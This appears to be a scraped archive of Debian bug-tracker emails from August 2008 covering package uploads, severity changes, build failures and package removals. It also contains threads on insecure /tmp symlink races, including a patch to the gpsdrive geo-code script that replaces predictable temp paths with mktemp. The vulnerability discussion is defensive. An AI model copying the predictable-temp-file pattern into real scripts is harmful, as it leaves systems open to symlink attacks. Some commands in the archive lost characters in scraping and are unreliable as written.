mt-daapd_0.9~r1696-1.4.diff.gz
  to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4.diff.gz
mt-daapd_0.9~r1696-1.4.dsc
  to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4.dsc
mt-daapd_0.9~r1696-1.4_amd64.deb
  to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Nico Golde [EMAIL PROTECTED] (supplier of updated mt-daapd package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Wed, 27 Aug 2008 14:53:45 +0200
Source: mt-daapd
Binary: mt-daapd
Architecture: source amd64
Version: 0.9~r1696-1.4
Distribution: unstable
Urgency: low
Maintainer: Joshua Kwan [EMAIL PROTECTED]
Changed-By: Nico Golde [EMAIL PROTECTED]
Description: 
 mt-daapd   - iTunes-compatible DAAP server
Closes: 483337 496217
Changes: 
 mt-daapd (0.9~r1696-1.4) unstable; urgency=low
 .
   * Fix authentication upstream patch checking for a wrong return value
 (03_fix-authentication.dpatch; Closes: #496217).
   * Fix taglib api calls (04_taglib_api_calls.dpatch; Closes: #483337)
Checksums-Sha1: 
 a481b039be558819f8bc140717368c7ff765badb 1161 mt-daapd_0.9~r1696-1.4.dsc
 6fb99300b305f8016f5f27af32281620b7bb8ee0 20572 

Bug#496371: [Pkg-lustre-maintainers] Bug#496371: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Stephen Gran
This one time, at band camp, Patrick Winnertz said:
 Thanks Stephen,
 
  tmpfile=$(mktemp /tmp/iozone.XX)
 I know that this way it is possible. But as the user should find the log 
 afterwards I would prefer to use /tmp/iozone.log or something else, nothing 
 random. 
 But as I wrote in my previous email I don't have a idea how to fix this 
 without 
 using mktemp.

You can echo what file to look at.
-- 
 -
|   ,''`.Stephen Gran |
|  : :' :[EMAIL PROTECTED] |
|  `. `'Debian user, admin, and developer |
|`- http://www.debian.org |
 -


signature.asc
Description: Digital signature


Processed: severity of 495968 is grave

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.35
 severity 495968 grave
Bug#495968: [gpicview] security RC bugs
Severity set to `grave' from `grave'


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: severity of 495968 is grave

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.35
 severity 495968 grave
Bug#495968: [gpicview] security RC bugs
Severity set to `grave' from `serious'


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496217: marked as done (mt-daapd: admin page password always fails)

2008-08-27 Thread Debian Bug Tracking System

Your message dated Wed, 27 Aug 2008 14:02:03 +
with message-id [EMAIL PROTECTED]
and subject line Bug#496217: fixed in mt-daapd 0.9~r1696-1.4
has caused the Debian Bug report #496217,
regarding mt-daapd: admin page password always fails
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
496217: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496217
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: mt-daapd
Version: 0.2.4+r1376-1.1+etch1
Severity: grave
Justification: renders package unusable

After upgrading to the latest version of mt-daapd in stable,
the admin page does not accept the password that's in the config file.


-- System Information:
Debian Release: 4.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-4-486
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages mt-daapd depends on:
ii  adduser3.102 Add and remove users and groups
ii  avahi-daemon   0.6.16-3etch1 Avahi mDNS/DNS-SD daemon
ii  libavahi-compat-howl0  0.6.16-3etch1 Avahi Howl compatibility library
ii  libavcodec0d   0.cvs20060823-8   ffmpeg codec library
ii  libavformat0d  0.cvs20060823-8   ffmpeg file format library
ii  libc6  2.3.6.ds1-13etch7 GNU C Library: Shared libraries
ii  libflac7   1.1.2-8   Free Lossless Audio Codec - runtim
ii  libid3tag0 0.15.1b-10ID3 tag reading library from the M
ii  libogg01.1.3-2   Ogg Bitstream Library
ii  libsqlite3-0   3.3.8-1.1 SQLite 3 shared library
ii  libtag1c2a 1.4-4 TagLib Audio Meta-Data Library
ii  libtagc0   1.4-4 TagLib Audio Meta-Data Library (C 
ii  libvorbis0a1.1.2.dfsg-1.4The Vorbis General Audio Compressi
ii  libvorbisfile3 1.1.2.dfsg-1.4The Vorbis General Audio Compressi
ii  zlib1g 1:1.2.3-13compression library - runtime

mt-daapd recommends no packages.

-- no debconf information


---End Message---
---BeginMessage---
Source: mt-daapd
Source-Version: 0.9~r1696-1.4

We believe that the bug you reported is fixed in the latest version of
mt-daapd, which is due to be installed in the Debian FTP archive:

mt-daapd_0.9~r1696-1.4.diff.gz
  to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4.diff.gz
mt-daapd_0.9~r1696-1.4.dsc
  to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4.dsc
mt-daapd_0.9~r1696-1.4_amd64.deb
  to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Nico Golde [EMAIL PROTECTED] (supplier of updated mt-daapd package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Wed, 27 Aug 2008 14:53:45 +0200
Source: mt-daapd
Binary: mt-daapd
Architecture: source amd64
Version: 0.9~r1696-1.4
Distribution: unstable
Urgency: low
Maintainer: Joshua Kwan [EMAIL PROTECTED]
Changed-By: Nico Golde [EMAIL PROTECTED]
Description: 
 mt-daapd   - iTunes-compatible DAAP server
Closes: 483337 496217
Changes: 
 mt-daapd (0.9~r1696-1.4) unstable; urgency=low
 .
   * Fix authentication upstream patch checking for a wrong return value
 (03_fix-authentication.dpatch; Closes: #496217).
   * Fix taglib api calls (04_taglib_api_calls.dpatch; Closes: #483337)
Checksums-Sha1: 
 a481b039be558819f8bc140717368c7ff765badb 1161 mt-daapd_0.9~r1696-1.4.dsc
 6fb99300b305f8016f5f27af32281620b7bb8ee0 20572 mt-daapd_0.9~r1696-1.4.diff.gz
 dc2c4def9b23cdbd610bfb088e7707c0ca439b3c 747266 
mt-daapd_0.9~r1696-1.4_amd64.deb
Checksums-Sha256: 
 9dd4d9d75ef46eea098d86676c79e20a31feceb31c36cf9ffaad9fd5adbe384a 1161 
mt-daapd_0.9~r1696-1.4.dsc
 61be0885353d67d3856ad49d87258d6c1d9bef06ce82b4178d7d6881e1930179 20572 
mt-daapd_0.9~r1696-1.4.diff.gz
 79f42bb614dac6aa1593fba8e2d03fcb89723386523d68b626158f7f5ae10700 747266 
mt-daapd_0.9~r1696-1.4_amd64.deb
Files: 
 5fd1cb8b6b879f5d3f64ac85908c665f 1161 sound optional mt-daapd_0.9~r1696-1.4.dsc
 87eaa0bc1ab9d8838533e260cafa03e9 20572 sound optional 
mt-daapd_0.9~r1696-1.4.diff.gz
 

Processed: tagging 491655

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.35
 tags 491655 pending
Bug#491655: audacious: log file spammed with tuple_get_int assertion failure 
message
Tags were: patch
Tags added: pending


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496799: imp4: cyrus.php file missing

2008-08-27 Thread pmunoz
Package: imp4
Version: 4.2-1
Severity: grave
Justification: renders package unusable

The file /usr/share/horde3/imp/lib/Quota/cyrus.php has been removed from
horde3 (checked hord3 CVS website, stating courier.php and cyrus.php have
been merged somehow).

However some imp functions still use cyrus.php.

Symlinking cyrus.php to imap.php within the same directory solves the situation.

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.25-2-686 (SMP w/1 CPU core)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages imp4 depends on:
ii  horde3   3.2.1+debian0-2 horde web application framework
ii  php-mail-mime1.5.2-0.1   PHP PEAR module for creating MIME 
ii  php5-imap5.2.6-3 IMAP module for php5

imp4 recommends no packages.

Versions of packages imp4 suggests:
ii  aspell  0.60.6-1 GNU Aspell spell-checker
pn  imapproxy   none   (no description available)
ii  ingo1   1.2-1email filter component for Horde F
ii  ispell  3.1.20.0-4.4 International Ispell (an interacti
ii  kronolith2  2.2-1calendar component for Horde Frame
ii  turba2  2.2.1-1  contact management component for h

-- no debconf information



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464281: marked as done (adept: FTBFS: libtool: link: cannot find the library `/usr/lib/libept.la' or unhandled argument `/usr/lib/libept.la')

2008-08-27 Thread Debian Bug Tracking System

Your message dated Wed, 27 Aug 2008 16:49:28 +0200
with message-id [EMAIL PROTECTED]
and subject line No longer applies.
has caused the Debian Bug report #464281,
regarding adept: FTBFS: libtool: link: cannot find the library 
`/usr/lib/libept.la' or unhandled argument `/usr/lib/libept.la'
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
464281: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464281
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: adept
version: 2.1.3
Severity: serious
User: [EMAIL PROTECTED]
Usertags: qa-ftbfs-20080205 qa-ftbfs
Justification: FTBFS on i386

Hi,

During a rebuild of all packages in sid, your package failed to build on i386.

Relevant part:

  make[4]: Entering directory 
  `/build/user/adept-2.1.3/obj-i486-linux-gnu/adept/installer'
  g++ -DHAVE_CONFIG_H -I. -I/build/user/adept-2.1.3/./adept/installer -I../.. 
  -I/usr/include/kde -I/usr/share/qt3/include -I.  
  -I/usr/include/tagcoll-2.0.7   -I/usr/include/tagcoll-2.0.7  
  -I/build/user/adept-2.1.3/./adept/installer/.. -I..  -DQT_THREAD_SUPPORT  
  -D_REENTRANT  -Wno-long-long -Wundef -ansi -D_XOPEN_SOURCE=500 -D_BSD_SOURCE 
  -Wcast-align -Wconversion -Wchar-subscripts -Wall -W -Wpointer-arith 
  -DNDEBUG -DNO_DEBUG -O2 -g -Wall -O2 -Wformat-security 
  -Wmissing-format-attribute -Wno-non-virtual-dtor -fno-exceptions 
  -fno-check-new -fno-common -fexceptions -DQT_NO_ASCII_CAST 
  -DQT_NO_CAST_ASCII -DINSTALLER_DATA=\/usr/share/app-install\ -c -o main.o 
  /build/user/adept-2.1.3/./adept/installer/main.cpp
  /build/user/adept-2.1.3/./adept/installer/main.cpp: In function 'int 
  main(int, char**)':
  /build/user/adept-2.1.3/./adept/installer/main.cpp:16: warning: deprecated 
  conversion from string constant to 'char*'
  /build/user/adept-2.1.3/./adept/installer/main.cpp:38: warning: unused 
  variable 'args'
  /usr/share/qt3/bin/moc /build/user/adept-2.1.3/./adept/installer/app.h -o 
  app.moc
  g++ -DHAVE_CONFIG_H -I. -I/build/user/adept-2.1.3/./adept/installer -I../.. 
  -I/usr/include/kde -I/usr/share/qt3/include -I.  
  -I/usr/include/tagcoll-2.0.7   -I/usr/include/tagcoll-2.0.7  
  -I/build/user/adept-2.1.3/./adept/installer/.. -I..  -DQT_THREAD_SUPPORT  
  -D_REENTRANT  -Wno-long-long -Wundef -ansi -D_XOPEN_SOURCE=500 -D_BSD_SOURCE 
  -Wcast-align -Wconversion -Wchar-subscripts -Wall -W -Wpointer-arith 
  -DNDEBUG -DNO_DEBUG -O2 -g -Wall -O2 -Wformat-security 
  -Wmissing-format-attribute -Wno-non-virtual-dtor -fno-exceptions 
  -fno-check-new -fno-common -fexceptions -DQT_NO_ASCII_CAST 
  -DQT_NO_CAST_ASCII -DINSTALLER_DATA=\/usr/share/app-install\ -c -o app.o 
  /build/user/adept-2.1.3/./adept/installer/app.cpp
  /build/user/adept-2.1.3/./adept/installer/app.cpp:301: warning: unused 
  parameter 'b'
  /bin/sh ../../libtool --tag=CXX --mode=link g++  -Wno-long-long -Wundef 
  -ansi -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -Wcast-align -Wconversion 
  -Wchar-subscripts -Wall -W -Wpointer-arith -DNDEBUG -DNO_DEBUG -O2 -g -Wall 
  -O2 -Wformat-security -Wmissing-format-attribute -Wno-non-virtual-dtor 
  -fno-exceptions -fno-check-new -fno-common -fexceptions -DQT_NO_ASCII_CAST 
  -DQT_NO_CAST_ASCII -DINSTALLER_DATA=\/usr/share/app-install\   -o 
  adept_installer -L/usr/lib/debug main.o app.o ../adept/libadept.la 
  -lapt-front -ltagcoll2 -lz -lwibble   -lkio  
  mkdir .libs
  libtool: link: cannot find the library `/usr/lib/libept.la' or unhandled 
  argument `/usr/lib/libept.la'
  make[4]: *** [adept_installer] Error 1
  make[4]: Leaving directory 
  `/build/user/adept-2.1.3/obj-i486-linux-gnu/adept/installer'
  make[3]: *** [all-recursive] Error 1
  make[3]: Leaving directory `/build/user/adept-2.1.3/obj-i486-linux-gnu/adept'
  make[2]: *** [all-recursive] Error 1
  make[2]: Leaving directory `/build/user/adept-2.1.3/obj-i486-linux-gnu'
  make[1]: *** [all] Error 2
  make[1]: Leaving directory `/build/user/adept-2.1.3/obj-i486-linux-gnu'
  make: *** [debian/stamp-makefile-build] Error 2
  dpkg-buildpackage: failure: debian/rules build gave error exit status 2

The full build log is available from:
http://people.debian.org/~lucas/logs/2008/02/05

A list of current common problems and possible solutions is available at 
http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute!

About the archive rebuild: The rebuild was done on about 50 AMD64 nodes
of the Grid'5000 platform, using a clean chroot containing a sid i386
environment.  Internet was not accessible from the build systems.

-- 
| Lucas Nussbaum
| [EMAIL PROTECTED]   http://www.lucas-nussbaum.net/ |
| jabber: 

Bug#495154: Processed: RM: tmsnc/testing -- ROM; project discontinued upstream

2008-08-27 Thread Thomas Viehmann
Hi Miriam,

Debian Bug Tracking System wrote:
 Bug#495154: tmsnc: Package should not go into stable
 Changed Bug title to `RM: tmsnc/testing -- ROM; project discontinued 
 upstream' from `tmsnc: Package should not go into stable'.
based on the bug report, it looks like the release team would prefer
removing it (as dead upstream) from unstable as well - testing removals
would have been handled by the release team, yet you indicate in the bug
that you only want removal from testing. Could you clarify this for me,
please?

Kind regards

T.
-- 
Thomas Viehmann, http://thomas.viehmann.net/



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#495968: [gpicview] security RC bugs

2008-08-27 Thread Nico Golde
Hi,
[2] [ 2019485 ] gpicview ask_before_save is ignored with LIBJPEG
[3] [ 2019492 ] gpicview ask_before_save is ignored if auto_save_rotated

those are no security bugs, there is no way for another user 
to exploit this. Those are just normal application bugs.

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgpURF869mAh0.pgp
Description: PGP signature


Processed: No longer applies.

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 fixed 464281 3.0~beta1
Bug#464281: adept: FTBFS: libtool: link: cannot find the library 
`/usr/lib/libept.la' or unhandled argument `/usr/lib/libept.la'
Bug marked as fixed in version 3.0~beta1.

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#491655: how about fixing this in a Debian revision / NMU

2008-08-27 Thread Thomas Viehmann
Hi,

Luk Claes wrote:
 Yes, I think it's worth fixing.
as not much seems to have happened in for a week (particularly not on
Friday), I'll be aiming at a NMU on Saturday. That should also give the
maintainers some breathing-room to consider what else they're planning
to do.

Kind regards

T.
-- 
Thomas Viehmann, http://thomas.viehmann.net/



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: Re: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 496436 patch confirmed
Bug#496436: The possibility of attack with the help of symlinks in some Debian 
packages
Tags were: security
Tags added: patch, confirmed

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496436: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Moritz Muehlenhoff
tags 496436 patch confirmed
thanks

Dmitry E. Oboukhov wrote:
 Package: gpsdrive-scripts
 Severity: grave
 
 Hi, maintainer!
 
 This message about the error concerns a few packages  at  once.   I've
 tested all the packages (for Lenny) on my Debian mirror.  All  scripts
 of packages (marked as executable) were tested.

The attached (untested) patch should fix this issue.

Cheers,
Moritz
diff -aur gpsdrive-2.10~pre4.orig/scripts/geo-code gpsdrive-2.10~pre4/scripts/geo-code
--- gpsdrive-2.10~pre4.orig/scripts/geo-code	2007-09-14 23:47:07.0 +0200
+++ gpsdrive-2.10~pre4/scripts/geo-code	2008-08-23 22:35:24.0 +0200
@@ -248,7 +248,7 @@
 #
 #	Main Program
 #
-TMP=/tmp/geo$$
+TMP=`mktemp`
 STYLE=${TMP}.style
 COORDS=${TMP}.coords
 OUTWAY=${TMP}.way
@@ -269,7 +269,7 @@
 		| head -n1 \
 		`
 	if [ $URL =  ]; then
-		cp $COORDS /tmp/geo.google
+		cp -d $COORDS /tmp/geo.google
 		error Unable to lookup telephone number or name with Google
 	else
 		URL=http://maps.yahoo.com/$URL;
@@ -295,7 +295,7 @@
 fi
 
 if [ $DEBUG -gt 0 ]; then
-filter=tee /tmp/geo.yahoo
+filter=tee `mktemp`
 else
 filter=cat
 fi
Nur in gpsdrive-2.10~pre4/scripts: geo-code~.


Bug#495154: Processed: RM: tmsnc/testing -- ROM; project discontinued upstream

2008-08-27 Thread Miriam Ruiz
2008/8/27 Thomas Viehmann [EMAIL PROTECTED]:
 Hi Miriam,

 Debian Bug Tracking System wrote:
 Bug#495154: tmsnc: Package should not go into stable
 Changed Bug title to `RM: tmsnc/testing -- ROM; project discontinued 
 upstream' from `tmsnc: Package should not go into stable'.
 based on the bug report, it looks like the release team would prefer
 removing it (as dead upstream) from unstable as well - testing removals
 would have been handled by the release team, yet you indicate in the bug
 that you only want removal from testing. Could you clarify this for me,
 please?

It would be better to remove it both from testing AND unstable. It
makes no sense to keep maintaining it in Debian at all.

Thanks,
Miry



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496803: util-vserver: system hang when shutting down host

2008-08-27 Thread Adam Borowski
Package: util-vserver
Version: 0.30.216~r2772-1
Severity: grave
Tags: patch
Justification: causes non-serious data loss


I'm afraid that /etc/init.d/util-vserver stop hangs if there is at least
one guest running; it's usually called on host shutdown when it will block
the whole system from rebooting/etc until human intervention, and even
worse, it's called after ssh and local logins are already disabled,
leaving only Ctrl-Alt-SysRQ or reset+hope for no fs damage.


Fix:
vserver $vserver stop 21 /dev/null
should be:
vserver $vserver stop 21 /dev/null



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#417142: NMU for websvn

2008-08-27 Thread Pierre Chifflier
On Wed, Aug 27, 2008 at 04:10:06PM +0200, Thijs Kinkhorst wrote:
 Hi Pierre,
 
 This RC bug has now been open for two weeks. I'm uploading an NMU to the 
 delayed-5 queue according to the attached patch. I hope this helps to keep 
 websvn in good shape in lenny.
 
 

Hi Thijs,

I'm merging your patch and asking for a freeze exception so it can reach lenny
in time.

Thanks !

Pierre



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#491655: [Pkg-audacious-maintainers] Bug#491655: how about fixing this in a Debian revision / NMU

2008-08-27 Thread William Pitcock
On Wed, 2008-08-27 at 16:52 +0200, Thomas Viehmann wrote:
 Hi,
 
 Luk Claes wrote:
  Yes, I think it's worth fixing.
 as not much seems to have happened in for a week (particularly not on
 Friday), I'll be aiming at a NMU on Saturday. That should also give the
 maintainers some breathing-room to consider what else they're planning
 to do.

I am not upload enabled at the moment, please proceed with the NMU.

You might take a look at some of the other patches and see if they are
worthwhile to include in the NMU too.

William



signature.asc
Description: This is a digitally signed message part


Processed: reopening sympa tmp races

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 reopen 494969
Bug#494969: sympa: Leftover debug code may lead to data loss
'reopen' may be inappropriate when a bug has been closed with a version;
you may need to use 'found' to remove fixed versions.
Bug#496405: The possibility of attack with the help of symlinks in some Debian 
packages
Bug reopened, originator not changed.

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: Re: Bug#496410: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 severity 496410 important
Bug#496410: The possibility of attack with the help of symlinks in some Debian 
packages
Severity set to `important' from `grave'

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496410: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Bastian Blank
severity 496410 important
thanks

On Wed, Aug 27, 2008 at 07:12:29PM +0400, Dmitry E. Oboukhov wrote:
 _or_ _causes_ _data_ _loss_

It does not cause data loss, the admin needs to execute it. And now stop
bitching around.

Bastian

-- 
Superior ability breeds superior ambition.
-- Spock, Space Seed, stardate 3141.9



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: Re: Bug#495154: Processed: RM: tmsnc/testing -- ROM; project discontinued upstream

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 retitle 495154 RM: tmsnc -- ROM; project discontinued upstream
Bug#495154: RM: tmsnc/testing -- ROM; project discontinued upstream
Changed Bug title to `RM: tmsnc -- ROM; project discontinued upstream' from 
`RM: tmsnc/testing -- ROM; project discontinued upstream'.

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#417142: marked as done (depends on non-essential package debconf in postrm)

2008-08-27 Thread Debian Bug Tracking System

Your message dated Wed, 27 Aug 2008 15:17:05 +
with message-id [EMAIL PROTECTED]
and subject line Bug#417142: fixed in websvn 2.0-3
has caused the Debian Bug report #417142,
regarding depends on non-essential package debconf in postrm
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
417142: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=417142
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: websvn
Version: 1.61-22
Severity: serious
Tags: etch-ignore
Justification: Policy violation, see section 7.2

hi,

while running archive wide piuparts tests your package failed on purge
because of debconf beeing unavailable during postrm:

  Purging configuration files for websvn ...
  /var/lib/dpkg/info/websvn.postrm: line 6: /usr/share/debconf/confmodule: No 
such file or directory
  dpkg: error processing websvn (--purge):
   subprocess post-removal script returned error exit status 1
  Errors were encountered while processing:
   websvn
  
the full log can be found here:

 http://people.debian.org/~abi/piuparts/websvn

please be sure to use a conditional call to debconf and its commands (this is
just an example):

--
 if [ -f /usr/share/debconf/confmodule ]; then
. /usr/share/debconf/confmodule
 fi

 db_get ||:
--

Please also note: Bugs filed on Packages failing in postrm because of debconf
beeing unavailable are not considered RC for etch, so are tagged etch-ignore.

bye,
- michael


---End Message---
---BeginMessage---
Source: websvn
Source-Version: 2.0-3

We believe that the bug you reported is fixed in the latest version of
websvn, which is due to be installed in the Debian FTP archive:

websvn_2.0-3.diff.gz
  to pool/main/w/websvn/websvn_2.0-3.diff.gz
websvn_2.0-3.dsc
  to pool/main/w/websvn/websvn_2.0-3.dsc
websvn_2.0-3_all.deb
  to pool/main/w/websvn/websvn_2.0-3_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Pierre Chifflier [EMAIL PROTECTED] (supplier of updated websvn package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Wed, 27 Aug 2008 17:12:24 +0200
Source: websvn
Binary: websvn
Architecture: source all
Version: 2.0-3
Distribution: unstable
Urgency: high
Maintainer: Pierre Chifflier [EMAIL PROTECTED]
Changed-By: Pierre Chifflier [EMAIL PROTECTED]
Description: 
 websvn - interface for subversion repositories written in PHP
Closes: 417142
Changes: 
 websvn (2.0-3) unstable; urgency=high
 .
   * Acknowledge NMU (thanks Thijs Kinkhorst) (Closes: #417142)
   * Bump standards version to 3.8.0 (no changes)
Checksums-Sha1: 
 11ba75ee70a3de7f11f5320a579b1352cea1e111 963 websvn_2.0-3.dsc
 18c14fa4e5bdf271ad64bb27b5055e0e1349a5ae 16737 websvn_2.0-3.diff.gz
 af6c1f9e9f69f49c6daf90f21230f97b24b44169 191040 websvn_2.0-3_all.deb
Checksums-Sha256: 
 7ea1ed77de71161e2f1544b9e169e29039015e81c356e33b9cd06c0f0d2f32b6 963 
websvn_2.0-3.dsc
 2db9fd5c25bc84774e55123e191152e4f924c21ef123fdfc9b0f726c82efbcf4 16737 
websvn_2.0-3.diff.gz
 a31bd6d2b1f535bff06a7ec880d878d75b0abfdf0920fbe9608ae0c1542d1d62 191040 
websvn_2.0-3_all.deb
Files: 
 5cb7ba45c36151189ac1ad1c95f202bc 963 devel optional websvn_2.0-3.dsc
 f8b1a4304ed977b01cbd63473433c163 16737 devel optional websvn_2.0-3.diff.gz
 5c12b6cf18768e1e779119d2adce49c7 191040 devel optional websvn_2.0-3_all.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFItW70twVrWo1fQMsRAhYrAKCEHn/jam7S3MiGCkYyroAKGhyaXQCdEct2
emoywzQNqrF25HTnv4A5sUc=
=UAtG
-END PGP SIGNATURE-


---End Message---


Bug#495154: Processed: RM: tmsnc/testing -- ROM; project discontinued upstream

2008-08-27 Thread Thomas Viehmann
retitle 495154 RM: tmsnc -- ROM; project discontinued upstream
thanks

Miriam Ruiz wrote:
 It would be better to remove it both from testing AND unstable. It
 makes no sense to keep maintaining it in Debian at all.
Will do. Thanks for the quick reply!

Kind regards

T.
-- 
Thomas Viehmann, http://thomas.viehmann.net/



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#491655: [Pkg-audacious-maintainers] Bug#491655: how about fixing this in a Debian revision / NMU

2008-08-27 Thread Thomas Viehmann
William Pitcock wrote:
 I am not upload enabled at the moment, please proceed with the NMU.

 You might take a look at some of the other patches and see if they are
 worthwhile to include in the NMU too.

If you can whip up a short MU for sponsoring, we could also go with
that. Otherwise, I'd probably focus on the most urgent stuff, so I would
